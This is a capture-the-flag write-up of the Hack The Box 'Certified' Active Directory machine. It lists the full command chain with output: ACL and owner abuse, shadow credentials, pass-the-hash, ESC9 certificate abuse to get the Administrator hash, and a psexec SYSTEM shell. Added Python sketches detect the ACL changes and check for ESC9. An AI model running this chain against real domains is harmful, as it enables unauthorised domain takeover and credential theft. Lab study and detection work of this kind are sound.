Here are my notes on the CERTIFIED box from Hack The Box.
CERTIFIED: 10.129.119.214
#As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
judith.mader:judith09
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u judith.mader -p 'judith09' -d certified.htb --dns-tcp -ns 10.129.228.192
BLOODHOUND DATA:
Judith.Mader -> WriteOwner -> Management@CERTIFIED.HTB Group:
python3 owneredit.py -action read -target 'Management' 'certified.htb'/'judith.mader':'judith09'
python3 owneredit.py -action write -new-owner 'judith.mader' -target 'Management' 'certified.htb'/'judith.mader':'judith09'
python3 owneredit.py -action read -target 'Management' 'certified.htb'/'judith.mader':'judith09'
python3 dacledit.py -action 'write' -rights 'FullControl' -principal judith.mader -target 'Management' 'certified.htb'/'judith.mader':'judith09'
net rpc group addmem "Management" "judith.mader" -U 'certified.htb'/'judith.mader':'judith09' -S 10.129.228.192
net rpc group members "Management" -U 'certified.htb'/'judith.mader':'judith09' -S 10.129.228.192
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# net rpc group members "Management" -U 'certified.htb'/'judith.mader' -S 10.129.228.192
Password for [CERTIFIED.HTB\judith.mader]:
CERTIFIED\judith.mader
CERTIFIED\management_svc
Now judith.mader is a member of the Management group, so she holds the group's permissions over management_svc (whose Kerberoast hash is uncrackable), because both users are now in the same group.
Management Group -> GenericWrite -> management_svc user -> CanPSRemote -> DC01.CERTIFIED.HTB:
net rpc password 'management_svc' Password123 -U certified.htb/judith.mader%judith09 -S dc01.certified.htb
net rpc password "management_svc" "Password12345" -U "certified.htb"/"judith.mader"%'judith09' -S "10.129.228.192"
certipy find -vulnerable -stdout -u judith.mader@certified.htb -p judith09 -dc-ip 10.129.228.192
GenericWrite -> Shadow Credentials with PyWhisker and Certipy:
BloodHound DATA:
judith.mader user -> Member of Management Group -> GenericWrite -> management_svc user -> CanPSRemote -> DC01.CERTIFIED.HTB:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
certipy cert -export -pfx QVi50QwS.pfx -password "vErXoK0pJE1Emln8xoXE" -out unprotected_pfx.pfx
certipy auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "certified.htb"
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pywhisker]
└─# timedatectl set-ntp off
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pywhisker]
└─# sudo rdate -n 10.129.228.192
Sat Nov 30 20:59:46 EST 2024
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pywhisker]
└─# certipy auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "certified.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584
#Keep re-running timedatectl and rdate until this command extracts the hash of management_svc (KRB_AP_ERR_SKEW / Clock skew too great troubleshooting).
crackmapexec winrm 10.129.228.192 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
SMB 10.129.228.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certified.htb)
HTTP 10.129.228.192 5985 DC01 [*] http://10.129.228.192:5985/wsman
WINRM 10.129.228.192 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
https://i-tracing.com/blog/shadow-credentials/
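The ACL-abuse chain above (owner change, DACL edit, self-added group membership) and the shadow-credential write both leave directory-change audit records on the DC. The following detection sketch is an added example, not part of the original note or of any tool it uses: it runs over a handful of constructed Windows Security events (5136 directory object modified, 4728 member added to a global group, 4724 password reset) and flags each stage, then groups the hits per actor so one account touching several stages stands out from isolated noise. The TRUSTED_ADMINS allowlist and every sample field value are assumptions for the example.

```python
"""Detection sketch for the ACL-abuse and shadow-credential steps in this note.
Added example, not part of the original note; sample events are constructed and
use the field names of Windows Security events 5136, 4728 and 4724."""
from collections import defaultdict

# Accounts expected to edit ACLs, group membership and passwords.
# Constructed allowlist for the example; in production this comes from the tiering model.
TRUSTED_ADMINS = {"administrator", "svc_helpdesk"}

# Constructed sample events (not real logs from the box).
# For 5136, OperationType %%14674 means "Value Added".
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=Management,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"EventID": 4728, "SubjectUserName": "judith.mader", "TargetUserName": "Management",
     "MemberName": "CN=judith.mader,CN=Users,DC=certified,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 4724, "SubjectUserName": "management_svc", "TargetUserName": "ca_operator"},
    # Benign noise: an admin resetting a password, and a routine attribute change.
    {"EventID": 4724, "SubjectUserName": "administrator", "TargetUserName": "judith.mader"},
    {"EventID": 5136, "SubjectUserName": "administrator",
     "ObjectDN": "CN=judith.mader,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]


def _cn(dn):
    """First RDN value of a DN, lower-cased: 'CN=Foo,CN=Users,...' -> 'foo'."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()


def classify(event):
    """Return an alert tag for a single event, or None if it looks benign."""
    eid = event.get("EventID")
    subject = event.get("SubjectUserName", "").lower()
    if eid == 5136:
        attr = event.get("AttributeLDAPDisplayName", "")
        target = _cn(event["ObjectDN"])
        # A key credential written onto someone else's account is the
        # shadow-credential primitive; self-enrolment writes it as the account itself.
        if attr == "msDS-KeyCredentialLink" and subject != target:
            return "shadow_credential_write"
        # Owner and DACL both live in the security descriptor.
        if attr == "nTSecurityDescriptor" and subject not in TRUSTED_ADMINS:
            return "acl_or_owner_change"
    elif eid in (4728, 4732, 4756):  # global / local / universal group add
        if _cn(event.get("MemberName", "CN=")) == subject:
            return "self_added_to_group"
        if subject not in TRUSTED_ADMINS:
            return "group_membership_change"
    elif eid == 4724 and subject not in TRUSTED_ADMINS:
        return "password_reset_by_non_admin"
    return None


def detect(events):
    """Return (alerts, chains): one (subject, tag) per suspicious event, plus the
    ordered list of tags per subject so multi-stage activity is visible."""
    alerts = []
    chains = defaultdict(list)
    for ev in events:
        tag = classify(ev)
        if tag:
            alerts.append((ev["SubjectUserName"], tag))
            chains[ev["SubjectUserName"].lower()].append(tag)
    return alerts, dict(chains)


if __name__ == "__main__":
    found, per_actor = detect(SAMPLE_EVENTS)
    for subject, tag in found:
        print(f"{tag:28s} by {subject}")
    for actor, steps in per_actor.items():
        if len(steps) > 1:
            print(f"chain for {actor}: {' -> '.join(steps)}")
```

Event 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the affected objects carry a matching SACL, so the msDS-KeyCredentialLink and nTSecurityDescriptor rules above are silent on a default DC until that auditing is switched on.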
management_svc user -> GenericAll -> ca_operator user:
pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u ca_operator -p Password123
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\ca_operator:Password123
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-29 23:26:10Z)
Clock Skew too great troubleshooting:
timedatectl set-ntp off
sudo rdate -n [RHOST]
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# GetUserSPNs.py -request -dc-ip 10.129.228.192 certified.htb/judith.mader:judith09
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# timedatectl set-ntp off
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# sudo rdate -n 10.129.228.192
Sat Nov 30 19:18:34 EST 2024
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# GetUserSPNs.py -request -dc-ip 10.129.228.192 certified.htb/judith.mader:judith09
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$8f8284560fe81b5[SNIP]
https://scribe.rip/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069
management_svc - Uncrackable Hash = NOPE !
#NO ASREPROASTING.
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# rpcclient --user="judith.mader%judith09" --command=enumdomusers -N 10.129.228.192
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# rpcclient --user="judith.mader" --command=enumdomusers -N 10.129.228.192
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.228.192 -x -W -D "judith.mader@certified.htb" -b "dc=certified,dc=htb" '(objectClass=person)'
ldapsearch -H ldap://10.129.228.192 -x -W -D "judith.mader@certified.htb" -b "dc=certified,dc=htb" '(objectClass=person)' > ldap-people
No interesting descriptions or password disclosure.
445/tcp open microsoft-ds?
#No interesting shares.
#No SYSVOL GPP scripts or interesting XML files.
sudo lookupsid.py judith.mader@10.129.228.192 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
#FROM BLOODHOUND ATTACK: Management GROUP -> GenericWrite -> management_svc user
crackmapexec winrm 10.129.228.192 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
SMB 10.129.228.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certified.htb)
HTTP 10.129.228.192 5985 DC01 [*] http://10.129.228.192:5985/wsman
WINRM 10.129.228.192 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
evil-winrm -i 10.129.228.192 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Documents> hostname
DC01
USER-SHELL !
*Evil-WinRM* PS C:\Users\management_svc\Desktop> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\management_svc\Desktop> dir
Directory: C:\Users\management_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/30/2024 3:32 PM 34 user.txt
*Evil-WinRM* PS C:\Users\management_svc\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
#FROM BLOODHOUND ATTACK: management_svc -> GenericAll -> ca_operator
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u ca_operator -p Password123
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\ca_operator:Password123
ESC9:
certipy find -vulnerable -stdout -u ca_operator@certified.htb -p Password123 -dc-ip 10.129.228.192
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
[SNIP]
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
[SNIP]
[!] Vulnerabilities
ESC9 : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
certipy req -username ca_operator@certified.htb -p Password123 -ca certified-DC01-CA -template CertifiedAuthentication -upn Administrator@certified.htb
certipy auth -pfx ca_operator.pfx -domain certified.htb
certipy auth -pfx ca_operator.pfx -domain certified.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Got hash for 'ca_operator@certified.htb': aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
certipy req -username ca_operator@certified.htb -hashes 58a478135a93ac3bf058a5ea0e8fdb71 -ca certified-DC01-CA -template CertifiedAuthentication -upn Administrator@certified.htb
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb
certipy auth -pfx administrator.pfx -domain certified.htb
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# timedatectl set-ntp off
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# sudo rdate -n 10.129.228.192
Sat Nov 30 21:42:00 EST 2024
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# certipy auth -pfx administrator.pfx -domain certified.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u administrator -H 0d5b49608bbce1751f708748f67e2d34
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\administrator:0d5b49608bbce1751f708748f67e2d34 (Pwn3d!)
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#id-5485
https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc9-no-security-extension
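As a defender-side counterpart to the ESC9 finding above, here is an added check (example code, not Certipy's) that evaluates, from raw LDAP attribute values, the three template and KDC conditions ESC9 depends on: the CT_FLAG_NO_SECURITY_EXTENSION bit in msPKI-Enrollment-Flag, an EKU in pKIExtendedKeyUsage that permits client authentication, and a KDC StrongCertificateBindingEnforcement value below 2 (full enforcement). The enrollment-flag values and the second sample template are constructed; only the template name CertifiedAuthentication comes from the note. The GenericWrite prerequisite on the victim account (used above to rewrite its UPN) is outside this check.

```python
"""Defender-side ESC9 check. Added example, not Certipy's code; sample attribute
values are constructed, only the template name comes from the note."""

# msPKI-Enrollment-Flag bit telling the CA to omit the szOID_NTDS_CA_SECURITY_EXT
# (SID) extension from issued certificates.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000
CT_FLAG_PUBLISH_TO_DS = 0x00000008  # unrelated bit, used only to build sample values

# EKU OIDs that allow a certificate to be used for Kerberos (PKINIT) logon.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Constructed sample templates: 'enrollment_flag' is msPKI-Enrollment-Flag,
# 'ekus' is pKIExtendedKeyUsage, 'enabled' means published on a CA.
SAMPLE_TEMPLATES = [
    {"name": "CertifiedAuthentication",
     "enrollment_flag": CT_FLAG_PUBLISH_TO_DS | CT_FLAG_NO_SECURITY_EXTENSION,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enabled": True},
    {"name": "WebServerOnly",  # no security extension, but Server Authentication only
     "enrollment_flag": CT_FLAG_NO_SECURITY_EXTENSION,
     "ekus": ["1.3.6.1.5.5.7.3.1"], "enabled": True},
]


def check_esc9(template, strong_binding_enforcement):
    """Return (is_esc9, conditions).

    strong_binding_enforcement is the DC registry value
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement
    (0 = disabled, 1 = compatibility, 2 = full enforcement). All four conditions
    must hold for the template to be abusable as ESC9.
    """
    ekus = template["ekus"]
    conditions = {
        "enabled": bool(template["enabled"]),
        "no_security_extension": bool(template["enrollment_flag"] & CT_FLAG_NO_SECURITY_EXTENSION),
        # An empty EKU list means "all purposes", which includes client auth.
        "client_auth_eku": (not ekus) or bool(CLIENT_AUTH_EKUS & set(ekus)),
        "kdc_not_full_enforcement": strong_binding_enforcement != 2,
    }
    return all(conditions.values()), conditions


def remediate_flag(enrollment_flag):
    """Clear the bit so newly issued certificates carry the SID extension again."""
    return enrollment_flag & ~CT_FLAG_NO_SECURITY_EXTENSION


def audit(templates, strong_binding_enforcement):
    """Names of templates that meet every ESC9 condition."""
    return [t["name"] for t in templates if check_esc9(t, strong_binding_enforcement)[0]]


if __name__ == "__main__":
    for mode in (1, 2):
        print(f"StrongCertificateBindingEnforcement={mode}: {audit(SAMPLE_TEMPLATES, mode)}")
```

Either fix on its own closes the finding: clearing the flag on the template restores the SID extension to new certificates, while setting the KDC to full enforcement makes it reject certificates that lack a SID mapping regardless of how templates are configured; doing both is the defensible default.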
sudo rlwrap psexec.py -hashes :0d5b49608bbce1751f708748f67e2d34 administrator@certified.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on certified.htb.....
[*] Found writable share ADMIN$
[*] Uploading file TNjguwcr.exe
[*] Opening SVCManager on certified.htb.....
[*] Creating service apsI on certified.htb.....
[*] Starting service apsI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EA74-A0A7
Directory of C:\Users\Administrator\Desktop
10/22/2024 12:15 PM <DIR> .
10/22/2024 12:15 PM <DIR> ..
11/30/2024 03:32 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,229,105,152 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49724/tcp open msrpc Microsoft Windows RPC
49745/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
PORT STATE SERVICE
53/udp open domain
123/udp open ntp